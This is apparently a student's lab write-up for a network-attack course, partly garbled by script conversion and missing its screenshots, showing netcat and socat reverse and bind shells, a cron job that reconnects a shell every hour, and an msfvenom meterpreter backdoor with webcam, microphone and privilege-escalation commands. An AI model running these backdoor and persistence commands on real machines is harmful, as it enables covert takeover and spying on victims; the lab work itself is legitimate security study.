20155324《網絡對抗》Exp2 後門原理與實踐

20155324《網絡對抗》Exp2 後門原理與實踐

20155324《網絡對抗》Exp2 後門原理與實踐

經常使用後門工具實踐

Windows得到Linux Shell

  1. 在Windows下,先使用ipconfig指令查看本機IP:
    html

  2. 使用ncat.exe程序監聽本機的5324端口:linux

  1. 在Kali環境下,使用nc指令的-e選項反向鏈接Windows主機的5324端口:

  1. Windows下成功得到了一個Kalishell,運行ls指令以下:

Linux得到Windows Shell

  1. 過程與以前的相似,在~Kali~環境下用~ifconfig~查看IP:
    web

  2. 使用~nc~指令監聽~5324~端口:
    shell

  3. 在Windows下,使用~ncat.exe~程序的~-e~選項項反向鏈接Kali主機的~5324~端口:
    vim

  4. Kali下能夠看到Windows的命令提示,能夠輸入Windows命令:
    windows

使用nc傳輸數據

  1. Windows下監聽5324端口:網絡

  2. Kali下鏈接到Windows的5324端口:
    tcp

  3. 創建鏈接以後,就能夠傳輸數據了,這裏傳輸的是字符串,至關於兩臺主機在聊天,也能夠用重定向操做符來傳輸文件:
    編輯器

實驗內容

使用netcat獲取主機操做Shell,cron啓動

  1. 先在Windows系統下,監聽5324端口:
  2. Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中咱們能夠知道crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行。
    工具

  3. crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行:用crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行
  4. 在最後一行添加13 * * * * /bin/netcat 192.168.1.103 5324 -e /bin/sh,意思是在每一個小時的第37分鐘反向鏈接Windows主機的5324端口,設置成37的緣由是我當時的時間是19點36,爲了能立馬看到效果,因此我將時間設置在了一分鐘之後:

  5. 當時間到了16點13時,此時已經得到了Kali的shell,能夠輸入指令(若是在這以前輸入指令,屏幕上不會有顯示,可是等到了13分時會立馬顯示出來):

使用socat獲取主機操做Shell, 任務計劃啓動

基礎知識

  1. socatncat的加強版,它使用的格式是socat [options] <address> <address>,其中兩個address是必選項,而options 是可選項。

  2. socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

實踐過程

  1. 在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器:
  2. 在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5324 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5324,同時把cmd.exestderr重定向到stdout上:
  3. 建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:

  1. 此時,在Kali環境下輸入指令socat - tcp:192.168.1.103:5324,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的5324端口,此時能夠發現已經成功得到了一個cmd shell

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 輸入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=5324 -f exe > 2015324_backdoor.exe

生成後門程序:

經過nc指令將生成的後門程序傳送到Windows主機上:

在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:

在msf的命令下輸入命令use exploit/multi/handler,payload設置命令set payload windows/meterpreter/reverse_tcp,繼續設置IP(此處設置虛擬機的Linux的IP地址)和端口

Linux使用exploit命令開始監聽,此時在Win上執行後門程序。

打開Windows上的後門程序:

此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:

  • 錄音功能:record_mic

  • 拍照功能:webcam_snap

  • 拍攝視頻功能:webcam_stream

  • 記錄擊鍵功能:screenshot

  • 提權:getuid以及getsystem

實驗總結與體會

經過本次實驗我都驚了!經過電腦直接的控制來實現一些功能,從而達到目的。因此咱們要在平常使用電腦的過程當中正確的使用,不讓居心不軌者有可乘之機。

相關文章
相關標籤/搜索